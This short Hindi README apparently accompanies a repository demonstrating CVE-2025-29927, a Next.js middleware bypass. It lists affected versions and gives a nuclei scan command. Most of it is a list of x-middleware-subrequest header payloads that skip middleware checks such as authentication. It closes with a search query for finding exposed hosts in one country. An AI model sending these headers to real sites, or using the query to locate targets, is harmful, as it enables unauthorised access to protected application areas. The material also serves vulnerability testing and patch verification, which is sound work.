
CVE-2025-29927: Next.js मिडलवेयर बाईपास भेद्यता
CVE-2025-29927: Next.js मिडलवेयर बायपास भेद्यता यह रिपॉजिटरी Next.js में CVE-2025-29927 भेद्यता को प्रदर्शित करती है, जहां आंतरिक हेडर x-middleware-subrequest का उपयोग प्रमाणीकरण जैसे मिडलवेयर जांचों को बायपास करने के लिए किया जा सकता है।
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/dashboard/_middleware
x-middleware-subrequest: pages/dashboard/panel/_middleware
x-middleware-subrequest: middleware
x-middleware-subrequest: src/middleware
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
header="x-middleware-rewrite" && country="IR"